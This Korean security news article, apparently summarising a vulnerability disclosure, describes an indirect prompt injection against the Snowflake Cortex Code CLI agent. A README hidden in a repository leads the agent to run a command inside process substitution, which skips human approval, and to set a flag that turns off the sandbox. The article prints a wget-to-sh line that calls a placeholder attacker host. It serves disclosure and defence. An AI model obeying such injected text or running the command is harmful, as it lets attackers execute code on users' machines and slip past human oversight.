Snowflake Cortex Code CLI 취약점으로 샌드박스 탈출 및 멀웨어 실행 가능

취약점 상세 정보
Snowflake Cortex Code CLI는 Claude Code 및 OpenAI의 Codex와 유사하게 작동하는 명령줄 코딩 에이전트로, Snowflake에서 SQL을 실행하기 위한 내장 통합 기능을 갖추고 있습니다. 출시 2일 후, Cortex Code의 명령 검증 시스템에서 취약점이 발견되었으며, 이로 인해 특별히 구성된 악성 명령이 인간 승인 단계를 트리거하지 않고 임의 명령을 실행할 수 있었으며, Cortex CLI의 샌드박스 외부에서 해당 명령을 실행할 수 있었습니다.
공격 체인
이 공격은 간접 프롬프트 인젝션을 통해 작동합니다. 사용자가 Cortex를 열고 샌드박스를 켠 후, 타사 오픈소스 코드베이스에 대한 도움을 Cortex에 요청합니다. 신뢰할 수 없는 저장소의 README에 숨겨진 프롬프트 인젝션이 Cortex를 조작하여 위험한 명령을 실행해야 한다고 믿게 만듭니다.
Cortex는 프로세스 치환 표현식 내부의 명령을 검증하지 못하여 악성 명령의 승인되지 않은 실행을 허용했습니다:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))이 명령은 공격자의 서버에서 스크립트를 다운로드하여 실행합니다. 이 우회가 작동한 이유는 다음과 같습니다:
- 프로세스 치환 <() 표현식 내부의 안전하지 않은 명령이 검증 시스템에 의해 평가되지 않았습니다
- 전체 명령이 '안전한' 명령(이 경우 cat)으로 시작했습니다
- 프로세스 치환 표현식 내부의 명령은 인간 승인을 트리거하지 않았습니다
샌드박스 우회
프롬프트 인젝션은 또한 모델을 조작하여 샌드박스 없는 명령 실행을 트리거하는 플래그를 설정합니다. Cortex는 기본적으로 샌드박스 없는 명령 실행을 트리거하는 플래그를 설정할 수 있으며, 인젝션은 이를 활용하여 악성 명령이 샌드박스 외부에서 실행되도록 허용합니다.
대응 조치
Snowflake 보안 팀은 이 취약점을 검증하고 수정하여 2026년 2월 28일에 Cortex Code CLI 버전 1.0.25로 수정 사항을 출시했습니다. Snowflake의 전체 권고 사항은 Snowflake 커뮤니티 사이트에서 확인할 수 있습니다: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
참고: 이 공격 체인은 샌드박스가 아닌 사용자에게도 적용되었습니다. 문서에 따르면 OS+일반 모드에서는 모든 명령이 사용자 승인을 요청합니다. 샌드박스에서 실행되는 명령에는 네트워크 및 파일 접근 제한도 있습니다.
📖 전체 소스 읽기: HN AI Agents
👀 See Also

AI 에이전트가 SQL 인젝션을 악용해 McKinsey의 Lilli 챗봇을 침해하다
CodeWall의 보안 연구원들이 자율 AI 에이전트를 사용해 McKinsey의 내부 Lilli 챗봇을 해킹했으며, 인증되지 않은 API 엔드포인트의 SQL 인젝션 취약점을 통해 2시간 만에 프로덕션 데이터베이스에 대한 전체 읽기-쓰기 접근 권한을 얻었습니다.

클로드 코드에서 프롬프트 인젝션을 0으로 낮춘 다층 방어 체계
Anthropic의 Boris Cherny는 훈련, 의도 분류기, 입력 탐지와 같은 다층 방어가 보지 못한 공격에 대한 프롬프트 인젝션을 0%로 줄인다고 말합니다. 분류기는 이제 무료입니다.

Sieve: AI 코딩 도구 채팅 기록용 로컬 비밀 스캐너
Sieve가 Cursor, Claude Code, Copilot 및 기타 AI 코딩 어시스턴트 채팅 기록에서 API 키와 토큰 유출을 스캔합니다. 모든 스캔은 로컬에서 이루어지며, 수정 및 macOS 키체인 볼트 기능이 포함됩니다.

사용자 정의 AI 에이전트를 위한 OpenClaw 구성 요소 추출의 보안 분석
한 개발자가 OpenClaw의 소스 코드를 분석하여 커스텀 AI 에이전트에서 안전하게 추출해 사용할 수 있는 구성 요소를 Lethal Quartet 프레임워크로 평가했습니다. 분석 결과 Semantic Snapshots와 BrowserClaw 같은 구성 요소에서 심각한 보안 위험이 드러났습니다.